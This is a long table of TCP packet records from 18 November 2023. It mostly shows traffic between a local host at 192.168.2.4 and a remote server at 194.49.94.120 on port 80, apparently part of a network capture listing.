Nov 18, 2023 10:02:36.550101995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550102949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550118923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550120115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550137043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550153017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550163031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550170898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550188065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550198078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550204039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550220966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550240993 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550245047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550262928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550277948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550280094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550297976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550297976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550314903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550333977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550337076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550350904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550369024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550370932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550388098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550405979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550421953 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550424099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550441980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550453901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550458908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550473928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550477028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550493956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550512075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550515890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550529003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550546885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550549030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550564051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550581932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550596952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550599098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550623894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550640106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550641060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550656080 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550657988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550677061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550693035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550702095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550709963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550724983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550740957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550748110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550760984 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550767899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550786018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550801992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550808907 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550820112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550832987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550837994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550854921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550868988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550872087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550889969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550905943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550914049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550923109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550934076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550940037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550956011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550970078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.550971985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.550988913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551004887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551021099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551022053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551037073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551054001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551058054 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551070929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551074982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551086903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551104069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551115036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551120996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551137924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551151037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551155090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551167011 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551172972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551189899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551207066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551220894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551223993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551240921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551258087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551258087 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551274061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551275015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551290989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551306009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551314116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551322937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551338911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551350117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551356077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551371098 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551373005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551388979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551399946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551405907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551423073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551439047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551451921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551456928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551474094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551487923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551491022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551505089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551508904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551526070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551542044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551542997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551558018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551573992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551579952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551590919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551606894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551623106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551626921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551639080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551656008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.551659107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551678896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.551698923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.552022934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.553476095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.560583115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.588309050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.588433981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.594103098 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:36.622190952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.624238014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.661592960 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.669325113 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.669378042 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.806737900 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:36.806826115 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:36.806893110 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:36.825062037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825081110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825098038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825115919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825141907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825160027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825167894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825201035 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825217962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825237036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825239897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825264931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825282097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825298071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825314999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825315952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825333118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825350046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825355053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825367928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825385094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825395107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825403929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825421095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825423956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825438976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825457096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825459957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825504065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825525045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825759888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825830936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825850010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825866938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825885057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825896025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825902939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825922012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.825927973 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.825963974 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826013088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826035023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826051950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826069117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826069117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826086044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826105118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826107025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826122046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826138973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826139927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826155901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826172113 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826173067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826190948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826206923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826208115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826225996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826263905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826282024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826360941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826378107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826395035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826415062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826447010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826447964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826467037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826483011 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826515913 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826530933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826549053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826565981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826584101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826602936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826612949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826622009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826638937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826653957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826663971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826683044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826689959 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826716900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826772928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826792955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826808929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826832056 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826837063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826852083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826853991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826872110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826890945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826908112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.826908112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.826935053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827116013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827136040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827187061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827187061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827204943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827212095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827223063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827239037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827240944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827276945 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827625990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827778101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827795029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827815056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827827930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827831984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827851057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827868938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827886105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827886105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827888012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827908993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827923059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.827927113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.827961922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.828156948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.828210115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.828217030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.828716993 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.835990906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836009026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836026907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836090088 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836190939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836209059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836225033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836244106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836260080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836270094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836286068 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836287022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836303949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836304903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836323977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836324930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836369991 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836370945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836390018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836407900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836416960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836425066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836442947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836461067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836463928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836488008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836496115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836514950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836532116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836549044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836549044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836574078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836585045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836591959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836608887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836626053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836647034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836654902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836664915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836678028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836683035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836702108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836695910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836719990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836736917 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836770058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836772919 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836787939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836805105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836822033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836838007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836843014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836855888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836875916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836882114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836893082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.836921930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.836950064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837011099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837016106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837028027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837044954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837061882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837079048 CET	80	49744	194.49.94.120	192.168.2.4
